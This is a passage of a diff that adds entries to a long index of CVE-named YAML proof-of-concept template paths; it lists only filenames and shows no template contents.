./poc/cve/cve-2010-1219-1557.yaml ./poc/cve/cve-2010-1219-1558.yaml @@ -40401,6 +40517,7 @@ ./poc/cve/cve-2010-1461-1643.yaml ./poc/cve/cve-2010-1461-1644.yaml ./poc/cve/cve-2010-1461-1645.yaml +./poc/cve/cve-2010-1461.yaml ./poc/cve/cve-2010-1469-1646.yaml ./poc/cve/cve-2010-1469-1647.yaml ./poc/cve/cve-2010-1469-1648.yaml @@ -40504,6 +40621,7 @@ ./poc/cve/cve-2010-1540-1732.yaml ./poc/cve/cve-2010-1540-1733.yaml ./poc/cve/cve-2010-1540-1734.yaml +./poc/cve/cve-2010-1540.yaml ./poc/cve/cve-2010-1601-1735.yaml ./poc/cve/cve-2010-1601-1736.yaml ./poc/cve/cve-2010-1601-1737.yaml @@ -40514,6 +40632,7 @@ ./poc/cve/cve-2010-1602-1741.yaml ./poc/cve/cve-2010-1602-1742.yaml ./poc/cve/cve-2010-1602-1743.yaml +./poc/cve/cve-2010-1602.yaml ./poc/cve/cve-2010-1603-1744.yaml ./poc/cve/cve-2010-1603-1745.yaml ./poc/cve/cve-2010-1603-1746.yaml @@ -40632,11 +40751,13 @@ ./poc/cve/cve-2010-1953-1841.yaml ./poc/cve/cve-2010-1953-1842.yaml ./poc/cve/cve-2010-1953-1843.yaml +./poc/cve/cve-2010-1953.yaml ./poc/cve/cve-2010-1954-1844.yaml ./poc/cve/cve-2010-1954-1845.yaml ./poc/cve/cve-2010-1954-1846.yaml ./poc/cve/cve-2010-1954-1847.yaml ./poc/cve/cve-2010-1954-1848.yaml +./poc/cve/cve-2010-1954.yaml ./poc/cve/cve-2010-1955-1849.yaml ./poc/cve/cve-2010-1955-1850.yaml ./poc/cve/cve-2010-1955-1851.yaml @@ -40737,6 +40858,7 @@ ./poc/cve/cve-2010-2122-1930.yaml ./poc/cve/cve-2010-2122-1931.yaml ./poc/cve/cve-2010-2122-1932.yaml +./poc/cve/cve-2010-2122.yaml ./poc/cve/cve-2010-2128-1933.yaml ./poc/cve/cve-2010-2128-1934.yaml ./poc/cve/cve-2010-2128-1935.yaml @@ -40773,6 +40895,7 @@ ./poc/cve/cve-2010-2682-1961.yaml ./poc/cve/cve-2010-2682-1962.yaml ./poc/cve/cve-2010-2682-1963.yaml +./poc/cve/cve-2010-2682.yaml ./poc/cve/cve-2010-2857-1964.yaml ./poc/cve/cve-2010-2857-1965.yaml ./poc/cve/cve-2010-2857-1966.yaml @@ -41083,6 +41206,7 @@ ./poc/cve/cve-2012-5913-2224.yaml ./poc/cve/cve-2012-5913-2225.yaml ./poc/cve/cve-2012-5913-2226.yaml +./poc/cve/cve-2012-5913.yaml ./poc/cve/cve-2013-1965-2227.yaml ./poc/cve/cve-2013-1965-2228.yaml ./poc/cve/cve-2013-1965-2229.yaml @@ -41322,6 +41446,7 @@ ./poc/cve/cve-2014-6271-5.yaml ./poc/cve/cve-2014-6271-6.yaml ./poc/cve/cve-2014-6271-7.yaml +./poc/cve/cve-2014-6271.yaml ./poc/cve/cve-2014-6308-2404.yaml ./poc/cve/cve-2014-6308-2405.yaml ./poc/cve/cve-2014-6308-2406.yaml @@ -41540,6 +41665,7 @@ ./poc/cve/cve-2015-6920-2583.yaml ./poc/cve/cve-2015-6920-2584.yaml ./poc/cve/cve-2015-6920-2585.yaml +./poc/cve/cve-2015-6920.yaml ./poc/cve/cve-2015-7297-2586.yaml ./poc/cve/cve-2015-7297-2587.yaml ./poc/cve/cve-2015-7297-2588.yaml @@ -41639,6 +41765,7 @@ ./poc/cve/cve-2016-1000132-2668.yaml ./poc/cve/cve-2016-1000132-2669.yaml ./poc/cve/cve-2016-1000132-2670.yaml +./poc/cve/cve-2016-1000132.yaml ./poc/cve/cve-2016-1000133-2671.yaml ./poc/cve/cve-2016-1000133-2672.yaml ./poc/cve/cve-2016-1000133-2673.yaml @@ -41892,6 +42019,7 @@ ./poc/cve/cve-2017-11610-2873.yaml ./poc/cve/cve-2017-11610-2874.yaml ./poc/cve/cve-2017-11610-2875.yaml +./poc/cve/cve-2017-11610.yaml ./poc/cve/cve-2017-12138-2876.yaml ./poc/cve/cve-2017-12138-2877.yaml ./poc/cve/cve-2017-12138-2878.yaml @@ -41907,10 +42035,12 @@ ./poc/cve/cve-2017-12542-2885.yaml ./poc/cve/cve-2017-12542-2886.yaml ./poc/cve/cve-2017-12542-2887.yaml +./poc/cve/cve-2017-12542.yaml ./poc/cve/cve-2017-12544-2888.yaml ./poc/cve/cve-2017-12544-2889.yaml ./poc/cve/cve-2017-12544-2890.yaml ./poc/cve/cve-2017-12544-2891.yaml +./poc/cve/cve-2017-12544.yaml ./poc/cve/cve-2017-12583-2892.yaml ./poc/cve/cve-2017-12583-2893.yaml ./poc/cve/cve-2017-12583.yaml @@ -41937,6 +42067,7 @@ ./poc/cve/cve-2017-12635-2913.yaml ./poc/cve/cve-2017-12635-2914.yaml ./poc/cve/cve-2017-12635-2915.yaml +./poc/cve/cve-2017-12635.yaml ./poc/cve/cve-2017-12637-2916.yaml ./poc/cve/cve-2017-12637-2917.yaml ./poc/cve/cve-2017-12637-2918.yaml @@ -41950,6 +42081,7 @@ ./poc/cve/cve-2017-12794.yaml ./poc/cve/cve-2017-14135-2925.yaml ./poc/cve/cve-2017-14135-2926.yaml +./poc/cve/cve-2017-14135.yaml ./poc/cve/cve-2017-14524.yaml ./poc/cve/cve-2017-14535-2927.yaml ./poc/cve/cve-2017-14535-2928.yaml @@ -42108,6 +42240,7 @@ ./poc/cve/cve-2017-18638-2999.yaml ./poc/cve/cve-2017-18638-3000.yaml ./poc/cve/cve-2017-18638-3001.yaml +./poc/cve/cve-2017-18638.yaml ./poc/cve/cve-2017-3506-3002.yaml ./poc/cve/cve-2017-3506-3003.yaml ./poc/cve/cve-2017-3506-3004.yaml @@ -42184,6 +42317,7 @@ ./poc/cve/cve-2017-7529-3064.yaml ./poc/cve/cve-2017-7529-3065.yaml ./poc/cve/cve-2017-7529-3066.yaml +./poc/cve/cve-2017-7529.yaml ./poc/cve/cve-2017-7615-1.yaml ./poc/cve/cve-2017-7615-2.yaml ./poc/cve/cve-2017-7615-3.yaml @@ -42265,6 +42399,7 @@ ./poc/cve/cve-2018-0127-3119.yaml ./poc/cve/cve-2018-0127-3120.yaml ./poc/cve/cve-2018-0127-3121.yaml +./poc/cve/cve-2018-0127.yaml ./poc/cve/cve-2018-0296-3122.yaml ./poc/cve/cve-2018-0296-3123.yaml ./poc/cve/cve-2018-0296-3124.yaml @@ -42408,6 +42543,7 @@ ./poc/cve/cve-2018-12095-3231.yaml ./poc/cve/cve-2018-12095-3232.yaml ./poc/cve/cve-2018-12095-3233.yaml +./poc/cve/cve-2018-12095.yaml ./poc/cve/cve-2018-12296-3234.yaml ./poc/cve/cve-2018-12296-3235.yaml ./poc/cve/cve-2018-12296-3236.yaml @@ -42428,6 +42564,7 @@ ./poc/cve/cve-2018-12613-3248.yaml ./poc/cve/cve-2018-12613-3249.yaml ./poc/cve/cve-2018-12613-3250.yaml +./poc/cve/cve-2018-12613.yaml ./poc/cve/cve-2018-12634-3251.yaml ./poc/cve/cve-2018-12634-3252.yaml ./poc/cve/cve-2018-12634-3253.yaml @@ -42519,6 +42656,7 @@ ./poc/cve/cve-2018-14931-3323.yaml ./poc/cve/cve-2018-14931-3324.yaml ./poc/cve/cve-2018-14931-3325.yaml +./poc/cve/cve-2018-14931.yaml ./poc/cve/cve-2018-15138-3326.yaml ./poc/cve/cve-2018-15138-3327.yaml ./poc/cve/cve-2018-15138-3328.yaml @@ -42545,6 +42683,7 @@ ./poc/cve/cve-2018-15745-3344.yaml ./poc/cve/cve-2018-15745-3345.yaml ./poc/cve/cve-2018-15745-3346.yaml +./poc/cve/cve-2018-15745.yaml ./poc/cve/cve-2018-15961-3347.yaml ./poc/cve/cve-2018-15961-3348.yaml ./poc/cve/cve-2018-15961-3349.yaml @@ -42669,6 +42808,7 @@ ./poc/cve/cve-2018-18775-3448.yaml ./poc/cve/cve-2018-18775-3449.yaml ./poc/cve/cve-2018-18775-3450.yaml +./poc/cve/cve-2018-18775.yaml ./poc/cve/cve-2018-18777-3451.yaml ./poc/cve/cve-2018-18777-3452.yaml ./poc/cve/cve-2018-18777-3453.yaml @@ -42723,6 +42863,7 @@ ./poc/cve/cve-2018-19753-3488.yaml ./poc/cve/cve-2018-19753.yaml ./poc/cve/cve-2018-19877(1).yaml +./poc/cve/cve-2018-19877.yaml ./poc/cve/cve-2018-19892(1).yaml ./poc/cve/cve-2018-19892.yaml ./poc/cve/cve-2018-19914(1).yaml @@ -42746,6 +42887,7 @@ ./poc/cve/cve-2018-20470-3496.yaml ./poc/cve/cve-2018-20470-3497.yaml ./poc/cve/cve-2018-20470-3498.yaml +./poc/cve/cve-2018-20470.yaml ./poc/cve/cve-2018-20824-3499.yaml ./poc/cve/cve-2018-20824-3500.yaml ./poc/cve/cve-2018-20824-3501.yaml @@ -42756,6 +42898,7 @@ ./poc/cve/cve-2018-20985-3505.yaml ./poc/cve/cve-2018-20985-3506.yaml ./poc/cve/cve-2018-20985-3507.yaml +./poc/cve/cve-2018-20985.yaml ./poc/cve/cve-2018-2392-3508.yaml ./poc/cve/cve-2018-2392-3509.yaml ./poc/cve/cve-2018-2392-3510.yaml @@ -42846,6 +42989,7 @@ ./poc/cve/cve-2018-6389-3579.yaml ./poc/cve/cve-2018-6389-3580.yaml ./poc/cve/cve-2018-6389-3581.yaml +./poc/cve/cve-2018-6389.yaml ./poc/cve/cve-2018-6910-3582.yaml ./poc/cve/cve-2018-6910-3583.yaml ./poc/cve/cve-2018-6910-3584.yaml @@ -42903,6 +43047,7 @@ ./poc/cve/cve-2018-8006-3629.yaml ./poc/cve/cve-2018-8006-3630.yaml ./poc/cve/cve-2018-8006-3631.yaml +./poc/cve/cve-2018-8006.yaml ./poc/cve/cve-2018-8033-3632.yaml ./poc/cve/cve-2018-8033-3633.yaml ./poc/cve/cve-2018-8033-3634.yaml @@ -43087,6 +43232,7 @@ ./poc/cve/cve-2019-12461-3783.yaml ./poc/cve/cve-2019-12461.yaml ./poc/cve/cve-2019-12581(1).yaml +./poc/cve/cve-2019-12581.yaml ./poc/cve/cve-2019-12583(1).yaml ./poc/cve/cve-2019-12583-3784.yaml ./poc/cve/cve-2019-12583.yaml @@ -43213,6 +43359,7 @@ ./poc/cve/cve-2019-15713-3885.yaml ./poc/cve/cve-2019-15713-3886.yaml ./poc/cve/cve-2019-15713-3887.yaml +./poc/cve/cve-2019-15713.yaml ./poc/cve/cve-2019-15811(1).yaml ./poc/cve/cve-2019-15811.yaml ./poc/cve/cve-2019-15858-3888.yaml @@ -43262,6 +43409,7 @@ ./poc/cve/cve-2019-16313-3928.yaml ./poc/cve/cve-2019-16313-3929.yaml ./poc/cve/cve-2019-16313-3930.yaml +./poc/cve/cve-2019-16313.yaml ./poc/cve/cve-2019-16332-3931.yaml ./poc/cve/cve-2019-16332-3932.yaml ./poc/cve/cve-2019-16332-3933.yaml @@ -43306,6 +43454,7 @@ ./poc/cve/cve-2019-16931.yaml ./poc/cve/cve-2019-16932(1).yaml ./poc/cve/cve-2019-16932-3964.yaml +./poc/cve/cve-2019-16932.yaml ./poc/cve/cve-2019-16996(1).yaml ./poc/cve/cve-2019-16996-3965.yaml ./poc/cve/cve-2019-16996.yaml @@ -43363,6 +43512,7 @@ ./poc/cve/cve-2019-1821.yaml ./poc/cve/cve-2019-18371(1).yaml ./poc/cve/cve-2019-18371-4005.yaml +./poc/cve/cve-2019-18371.yaml ./poc/cve/cve-2019-18393-4006.yaml ./poc/cve/cve-2019-18393-4007.yaml ./poc/cve/cve-2019-18393-4008.yaml @@ -43442,6 +43592,7 @@ ./poc/cve/cve-2019-20085-4072.yaml ./poc/cve/cve-2019-20085-4073.yaml ./poc/cve/cve-2019-20085-4074.yaml +./poc/cve/cve-2019-20085.yaml ./poc/cve/cve-2019-20141-1(1).yaml ./poc/cve/cve-2019-20141-2(1).yaml ./poc/cve/cve-2019-20141-4075.yaml @@ -43539,8 +43690,10 @@ ./poc/cve/cve-2019-3799-4147.yaml ./poc/cve/cve-2019-3799-4148.yaml ./poc/cve/cve-2019-3799-4149.yaml +./poc/cve/cve-2019-3799.yaml ./poc/cve/cve-2019-3911-4150.yaml ./poc/cve/cve-2019-3911-4151.yaml +./poc/cve/cve-2019-3911.yaml ./poc/cve/cve-2019-3912-4152.yaml ./poc/cve/cve-2019-3912-4153.yaml ./poc/cve/cve-2019-3912-4154.yaml @@ -43567,6 +43720,7 @@ ./poc/cve/cve-2019-5418-4169.yaml ./poc/cve/cve-2019-5418-4170.yaml ./poc/cve/cve-2019-5418-4171.yaml +./poc/cve/cve-2019-5418.yaml ./poc/cve/cve-2019-6112-4172.yaml ./poc/cve/cve-2019-6112-4173.yaml ./poc/cve/cve-2019-6112-4174.yaml @@ -43607,6 +43761,7 @@ ./poc/cve/cve-2019-7238-4205.yaml ./poc/cve/cve-2019-7238-4206.yaml ./poc/cve/cve-2019-7238-4207.yaml +./poc/cve/cve-2019-7238.yaml ./poc/cve/cve-2019-7254-1(1).yaml ./poc/cve/cve-2019-7254-2(1).yaml ./poc/cve/cve-2019-7254-4208.yaml @@ -43855,6 +44010,7 @@ ./poc/cve/cve-2020-11530-4410.yaml ./poc/cve/cve-2020-11530-4411.yaml ./poc/cve/cve-2020-11530-4412.yaml +./poc/cve/cve-2020-11530.yaml ./poc/cve/cve-2020-11546-4413.yaml ./poc/cve/cve-2020-11546-4414.yaml ./poc/cve/cve-2020-11546.yaml @@ -43895,6 +44051,7 @@ ./poc/cve/cve-2020-11854-4441.yaml ./poc/cve/cve-2020-11854-4442.yaml ./poc/cve/cve-2020-11854-4443.yaml +./poc/cve/cve-2020-11854.yaml ./poc/cve/cve-2020-11930-4444.yaml ./poc/cve/cve-2020-11930-4445.yaml ./poc/cve/cve-2020-11930-4446.yaml @@ -43977,6 +44134,7 @@ ./poc/cve/cve-2020-13483-4505.yaml ./poc/cve/cve-2020-13483-4506.yaml ./poc/cve/cve-2020-13483-4507.yaml +./poc/cve/cve-2020-13483.yaml ./poc/cve/cve-2020-13700-4508.yaml ./poc/cve/cve-2020-13700-4509.yaml ./poc/cve/cve-2020-13700-4510.yaml @@ -44035,6 +44193,7 @@ ./poc/cve/cve-2020-14413-4554.yaml ./poc/cve/cve-2020-14413-4555.yaml ./poc/cve/cve-2020-14413-4556.yaml +./poc/cve/cve-2020-14413.yaml ./poc/cve/cve-2020-14750-4557.yaml ./poc/cve/cve-2020-14750-4558.yaml ./poc/cve/cve-2020-14750-4559.yaml @@ -44140,6 +44299,7 @@ ./poc/cve/cve-2020-16846.yaml ./poc/cve/cve-2020-16920-4647.yaml ./poc/cve/cve-2020-16920-4648.yaml +./poc/cve/cve-2020-16920.yaml ./poc/cve/cve-2020-16952-4649.yaml ./poc/cve/cve-2020-16952-4650.yaml ./poc/cve/cve-2020-16952-4651.yaml @@ -44282,8 +44442,10 @@ ./poc/cve/cve-2020-22208(1).yaml ./poc/cve/cve-2020-22208.yaml ./poc/cve/cve-2020-22209(1).yaml +./poc/cve/cve-2020-22209.yaml ./poc/cve/cve-2020-22210(1).yaml ./poc/cve/cve-2020-22210-4760.yaml +./poc/cve/cve-2020-22210.yaml ./poc/cve/cve-2020-22211(1).yaml ./poc/cve/cve-2020-22211.yaml ./poc/cve/cve-2020-22840-4761.yaml @@ -44526,6 +44688,7 @@ ./poc/cve/cve-2020-27986-4970.yaml ./poc/cve/cve-2020-27986-4971.yaml ./poc/cve/cve-2020-27986-4972.yaml +./poc/cve/cve-2020-27986.yaml ./poc/cve/cve-2020-28188-4973.yaml ./poc/cve/cve-2020-28188-4974.yaml ./poc/cve/cve-2020-28188-4975.yaml @@ -44540,6 +44703,7 @@ ./poc/cve/cve-2020-28351-4982.yaml ./poc/cve/cve-2020-28351-4983.yaml ./poc/cve/cve-2020-28351-4984.yaml +./poc/cve/cve-2020-28351.yaml ./poc/cve/cve-2020-28871-4985.yaml ./poc/cve/cve-2020-28871-4986.yaml ./poc/cve/cve-2020-28871-4987.yaml @@ -44655,6 +44819,7 @@ ./poc/cve/cve-2020-35774-5080.yaml ./poc/cve/cve-2020-35774-5081.yaml ./poc/cve/cve-2020-35774-5082.yaml +./poc/cve/cve-2020-35774.yaml ./poc/cve/cve-2020-3580-5083.yaml ./poc/cve/cve-2020-3580-5084.yaml ./poc/cve/cve-2020-3580-5085.yaml @@ -44688,6 +44853,7 @@ ./poc/cve/cve-2020-35951-5109.yaml ./poc/cve/cve-2020-35951-5110.yaml ./poc/cve/cve-2020-35951-5111.yaml +./poc/cve/cve-2020-35951.yaml ./poc/cve/cve-2020-36112-5112.yaml ./poc/cve/cve-2020-36112-5113.yaml ./poc/cve/cve-2020-36112-5114.yaml @@ -44750,6 +44916,7 @@ ./poc/cve/cve-2020-5405-5160.yaml ./poc/cve/cve-2020-5405-5161.yaml ./poc/cve/cve-2020-5405-5162.yaml +./poc/cve/cve-2020-5405.yaml ./poc/cve/cve-2020-5410-5163.yaml ./poc/cve/cve-2020-5410-5164.yaml ./poc/cve/cve-2020-5410-5165.yaml @@ -44805,6 +44972,7 @@ ./poc/cve/cve-2020-6171-5203.yaml ./poc/cve/cve-2020-6171-5204.yaml ./poc/cve/cve-2020-6171-5205.yaml +./poc/cve/cve-2020-6171.yaml ./poc/cve/cve-2020-6207-5206.yaml ./poc/cve/cve-2020-6207-5207.yaml ./poc/cve/cve-2020-6207-5208.yaml @@ -44824,6 +44992,7 @@ ./poc/cve/cve-2020-6308-5221.yaml ./poc/cve/cve-2020-6308-5222.yaml ./poc/cve/cve-2020-6308-5223.yaml +./poc/cve/cve-2020-6308.yaml ./poc/cve/cve-2020-6637-1(1).yaml ./poc/cve/cve-2020-6637-2(1).yaml ./poc/cve/cve-2020-6637-3(1).yaml @@ -44881,6 +45050,7 @@ ./poc/cve/cve-2020-7961-5268.yaml ./poc/cve/cve-2020-7961.yaml ./poc/cve/cve-2020-7980(1).yaml +./poc/cve/cve-2020-7980.yaml ./poc/cve/cve-2020-8091-5269.yaml ./poc/cve/cve-2020-8091-5270.yaml ./poc/cve/cve-2020-8091-5271.yaml @@ -44924,6 +45094,7 @@ ./poc/cve/cve-2020-8194-5305.yaml ./poc/cve/cve-2020-8194-5306.yaml ./poc/cve/cve-2020-8194-5307.yaml +./poc/cve/cve-2020-8194.yaml ./poc/cve/cve-2020-8209-5308.yaml ./poc/cve/cve-2020-8209-5309.yaml ./poc/cve/cve-2020-8209-5310.yaml @@ -44971,6 +45142,7 @@ ./poc/cve/cve-2020-8813-5345.yaml ./poc/cve/cve-2020-8813-5346.yaml ./poc/cve/cve-2020-8813-5347.yaml +./poc/cve/cve-2020-8813.yaml ./poc/cve/cve-2020-8982-5348.yaml ./poc/cve/cve-2020-8982-5349.yaml ./poc/cve/cve-2020-8982-5350.yaml @@ -45236,6 +45408,7 @@ ./poc/cve/cve-2021-21972-5549.yaml ./poc/cve/cve-2021-21972-5550.yaml ./poc/cve/cve-2021-21972-5551.yaml +./poc/cve/cve-2021-21972.yaml ./poc/cve/cve-2021-21973-5552.yaml ./poc/cve/cve-2021-21973-5553.yaml ./poc/cve/cve-2021-21973-5554.yaml @@ -45266,12 +45439,14 @@ ./poc/cve/cve-2021-22005-5576.yaml ./poc/cve/cve-2021-22005-5577.yaml ./poc/cve/cve-2021-22005-5578.yaml +./poc/cve/cve-2021-22005.yaml ./poc/cve/cve-2021-22053-5579.yaml ./poc/cve/cve-2021-22053-5580.yaml ./poc/cve/cve-2021-22053-5581.yaml ./poc/cve/cve-2021-22053.yaml ./poc/cve/cve-2021-22054(1).yaml ./poc/cve/cve-2021-22054-5582.yaml +./poc/cve/cve-2021-22054.yaml ./poc/cve/cve-2021-22122-1(1).yaml ./poc/cve/cve-2021-22122-2(1).yaml ./poc/cve/cve-2021-22122-5583.yaml @@ -45359,7 +45534,9 @@ ./poc/cve/cve-2021-24235-5651.yaml ./poc/cve/cve-2021-24235-5652.yaml ./poc/cve/cve-2021-24235-5653.yaml +./poc/cve/cve-2021-24235.yaml ./poc/cve/cve-2021-24236(1).yaml +./poc/cve/cve-2021-24236.yaml ./poc/cve/cve-2021-24237-5654.yaml ./poc/cve/cve-2021-24237-5655.yaml ./poc/cve/cve-2021-24237-5656.yaml @@ -45391,6 +45568,7 @@ ./poc/cve/cve-2021-24285-5674.yaml ./poc/cve/cve-2021-24285.yaml ./poc/cve/cve-2021-24286(1).yaml +./poc/cve/cve-2021-24286.yaml ./poc/cve/cve-2021-24288-5675.yaml ./poc/cve/cve-2021-24288-5676.yaml ./poc/cve/cve-2021-24288-5677.yaml @@ -45494,6 +45672,7 @@ ./poc/cve/cve-2021-24498.yaml ./poc/cve/cve-2021-24499-5756.yaml ./poc/cve/cve-2021-24499-5757.yaml +./poc/cve/cve-2021-24499.yaml ./poc/cve/cve-2021-24510-5758.yaml ./poc/cve/cve-2021-24510-5759.yaml ./poc/cve/cve-2021-24510.yaml @@ -45513,6 +45692,7 @@ ./poc/cve/cve-2021-24838-5770.yaml ./poc/cve/cve-2021-24838.yaml ./poc/cve/cve-2021-24891(1).yaml +./poc/cve/cve-2021-24891.yaml ./poc/cve/cve-2021-24910(1).yaml ./poc/cve/cve-2021-24910.yaml ./poc/cve/cve-2021-24926-5771.yaml @@ -45676,6 +45856,7 @@ ./poc/cve/cve-2021-26812-5883.yaml ./poc/cve/cve-2021-26812-5884.yaml ./poc/cve/cve-2021-26812-5885.yaml +./poc/cve/cve-2021-26812.yaml ./poc/cve/cve-2021-26855-5886.yaml ./poc/cve/cve-2021-26855-5887.yaml ./poc/cve/cve-2021-26855-5888.yaml @@ -45683,6 +45864,7 @@ ./poc/cve/cve-2021-26855-5890.yaml ./poc/cve/cve-2021-26855-5891.yaml ./poc/cve/cve-2021-26855-5892.yaml +./poc/cve/cve-2021-26855.yaml ./poc/cve/cve-2021-27132-5893.yaml ./poc/cve/cve-2021-27132-5894.yaml ./poc/cve/cve-2021-27132-5895.yaml @@ -45720,8 +45902,10 @@ ./poc/cve/cve-2021-27651-5919.yaml ./poc/cve/cve-2021-27651-5920.yaml ./poc/cve/cve-2021-27651-5921.yaml +./poc/cve/cve-2021-27651.yaml ./poc/cve/cve-2021-27748(1).yaml ./poc/cve/cve-2021-27748-5922.yaml +./poc/cve/cve-2021-27748.yaml ./poc/cve/cve-2021-27850-5923.yaml ./poc/cve/cve-2021-27850-5924.yaml ./poc/cve/cve-2021-27850-5925.yaml @@ -45760,6 +45944,7 @@ ./poc/cve/cve-2021-28150-5948.yaml ./poc/cve/cve-2021-28150-5949.yaml ./poc/cve/cve-2021-28150-5950.yaml +./poc/cve/cve-2021-28150.yaml ./poc/cve/cve-2021-28151-1(1).yaml ./poc/cve/cve-2021-28151-2(1).yaml ./poc/cve/cve-2021-28151-5951.yaml @@ -45839,6 +46024,7 @@ ./poc/cve/cve-2021-29490-6009.yaml ./poc/cve/cve-2021-29490-6010.yaml ./poc/cve/cve-2021-29490-6011.yaml +./poc/cve/cve-2021-29490.yaml ./poc/cve/cve-2021-29622-6012.yaml ./poc/cve/cve-2021-29622-6013.yaml ./poc/cve/cve-2021-29622-6014.yaml @@ -45852,6 +46038,7 @@ ./poc/cve/cve-2021-29625-6021.yaml ./poc/cve/cve-2021-29625-6022.yaml ./poc/cve/cve-2021-29625-6023.yaml +./poc/cve/cve-2021-29625.yaml ./poc/cve/cve-2021-3002-6024.yaml ./poc/cve/cve-2021-3002-6025.yaml ./poc/cve/cve-2021-3002.yaml @@ -45865,6 +46052,7 @@ ./poc/cve/cve-2021-30151-6032.yaml ./poc/cve/cve-2021-30151-6033.yaml ./poc/cve/cve-2021-30151-6034.yaml +./poc/cve/cve-2021-30151.yaml ./poc/cve/cve-2021-3017-6035.yaml ./poc/cve/cve-2021-3017-6036.yaml ./poc/cve/cve-2021-3017-6037.yaml @@ -45964,6 +46152,7 @@ ./poc/cve/cve-2021-31856-6116.yaml ./poc/cve/cve-2021-31856-6117.yaml ./poc/cve/cve-2021-31856-6118.yaml +./poc/cve/cve-2021-31856.yaml ./poc/cve/cve-2021-31862-6119.yaml ./poc/cve/cve-2021-31862-6120.yaml ./poc/cve/cve-2021-32030-6121.yaml @@ -46005,6 +46194,7 @@ ./poc/cve/cve-2021-32820-6150.yaml ./poc/cve/cve-2021-32820-6151.yaml ./poc/cve/cve-2021-32820-6152.yaml +./poc/cve/cve-2021-32820.yaml ./poc/cve/cve-2021-32853-6153.yaml ./poc/cve/cve-2021-32853-6154.yaml ./poc/cve/cve-2021-32853-6155.yaml @@ -46039,6 +46229,7 @@ ./poc/cve/cve-2021-33544-6179.yaml ./poc/cve/cve-2021-33544-6180.yaml ./poc/cve/cve-2021-33544-6181.yaml +./poc/cve/cve-2021-33544.yaml ./poc/cve/cve-2021-33564-6182.yaml ./poc/cve/cve-2021-33564-6183.yaml ./poc/cve/cve-2021-33564-6184.yaml @@ -46127,6 +46318,7 @@ ./poc/cve/cve-2021-35464-6253.yaml ./poc/cve/cve-2021-35464-6254.yaml ./poc/cve/cve-2021-35464-6255.yaml +./poc/cve/cve-2021-35464.yaml ./poc/cve/cve-2021-35587-6256.yaml ./poc/cve/cve-2021-35587-6257.yaml ./poc/cve/cve-2021-35587.yaml @@ -46140,6 +46332,7 @@ ./poc/cve/cve-2021-36260-6264.yaml ./poc/cve/cve-2021-36260.yaml ./poc/cve/cve-2021-36356(1).yaml +./poc/cve/cve-2021-36356.yaml ./poc/cve/cve-2021-36380-6265.yaml ./poc/cve/cve-2021-36380-6266.yaml ./poc/cve/cve-2021-36380-6267.yaml @@ -46243,6 +46436,7 @@ ./poc/cve/cve-2021-39320-6334.yaml ./poc/cve/cve-2021-39320-6335.yaml ./poc/cve/cve-2021-39320-6336.yaml +./poc/cve/cve-2021-39320.yaml ./poc/cve/cve-2021-39322-6337.yaml ./poc/cve/cve-2021-39322-6338.yaml ./poc/cve/cve-2021-39322-6339.yaml @@ -46477,6 +46671,7 @@ ./poc/cve/cve-2021-42566-6514.yaml ./poc/cve/cve-2021-42566-6515.yaml ./poc/cve/cve-2021-42566-6516.yaml +./poc/cve/cve-2021-42566.yaml ./poc/cve/cve-2021-42567-6517.yaml ./poc/cve/cve-2021-42567-6518.yaml ./poc/cve/cve-2021-42567-6519.yaml @@ -46513,6 +46708,7 @@ ./poc/cve/cve-2021-43810.yaml ./poc/cve/cve-2021-44077(1).yaml ./poc/cve/cve-2021-44077-6543.yaml +./poc/cve/cve-2021-44077.yaml ./poc/cve/cve-2021-44103(1).yaml ./poc/cve/cve-2021-44103-6544.yaml ./poc/cve/cve-2021-44152.yaml @@ -46546,6 +46742,7 @@ ./poc/cve/cve-2021-44848-6563.yaml ./poc/cve/cve-2021-44848-6564.yaml ./poc/cve/cve-2021-44848-6565.yaml +./poc/cve/cve-2021-44848.yaml ./poc/cve/cve-2021-45043-6566.yaml ./poc/cve/cve-2021-45043-6567.yaml ./poc/cve/cve-2021-45043-6568.yaml @@ -46626,6 +46823,7 @@ ./poc/cve/cve-2022-0218.yaml ./poc/cve/cve-2022-0271-6616.yaml ./poc/cve/cve-2022-0271-6617.yaml +./poc/cve/cve-2022-0271.yaml ./poc/cve/cve-2022-0281-6618.yaml ./poc/cve/cve-2022-0281-6619.yaml ./poc/cve/cve-2022-0281-6620.yaml @@ -46662,6 +46860,7 @@ ./poc/cve/cve-2022-0591-6637.yaml ./poc/cve/cve-2022-0591.yaml ./poc/cve/cve-2022-0594(1).yaml +./poc/cve/cve-2022-0594.yaml ./poc/cve/cve-2022-0595(1).yaml ./poc/cve/cve-2022-0595.yaml ./poc/cve/cve-2022-0599(1).yaml @@ -46702,6 +46901,7 @@ ./poc/cve/cve-2022-1119-6648.yaml ./poc/cve/cve-2022-1119.yaml ./poc/cve/cve-2022-1221(1).yaml +./poc/cve/cve-2022-1221.yaml ./poc/cve/cve-2022-1386(1).yaml ./poc/cve/cve-2022-1388-6649.yaml ./poc/cve/cve-2022-1388-6650.yaml @@ -46728,7 +46928,9 @@ ./poc/cve/cve-2022-1904(1).yaml ./poc/cve/cve-2022-1904.yaml ./poc/cve/cve-2022-1906(1).yaml +./poc/cve/cve-2022-1906.yaml ./poc/cve/cve-2022-1937(1).yaml +./poc/cve/cve-2022-1937.yaml ./poc/cve/cve-2022-1946(1).yaml ./poc/cve/cve-2022-1946.yaml ./poc/cve/cve-2022-21371-6657.yaml @@ -46738,7 +46940,9 @@ ./poc/cve/cve-2022-21500(1).yaml ./poc/cve/cve-2022-21500-6660.yaml ./poc/cve/cve-2022-21705(1).yaml +./poc/cve/cve-2022-21705.yaml ./poc/cve/cve-2022-2187(1).yaml +./poc/cve/cve-2022-2187.yaml ./poc/cve/cve-2022-22536-6661.yaml ./poc/cve/cve-2022-22536-6662.yaml ./poc/cve/cve-2022-22536.yaml @@ -46851,6 +47055,7 @@ ./poc/cve/cve-2022-26135(1).yaml ./poc/cve/cve-2022-26138(1).yaml ./poc/cve/cve-2022-26138-6728.yaml +./poc/cve/cve-2022-26138.yaml ./poc/cve/cve-2022-26148-6729.yaml ./poc/cve/cve-2022-26148-6730.yaml ./poc/cve/cve-2022-26148-6731.yaml @@ -46910,6 +47115,7 @@ ./poc/cve/cve-2022-29464-6753.yaml ./poc/cve/cve-2022-29548(1).yaml ./poc/cve/cve-2022-29548-6754.yaml +./poc/cve/cve-2022-29548.yaml ./poc/cve/cve-2022-30073(1).yaml ./poc/cve/cve-2022-30073.yaml ./poc/cve/cve-2022-30489(1).yaml @@ -46962,9 +47168,11 @@ ./poc/cve/cve-2022-34048(1).yaml ./poc/cve/cve-2022-34048.yaml ./poc/cve/cve-2022-34049(1).yaml 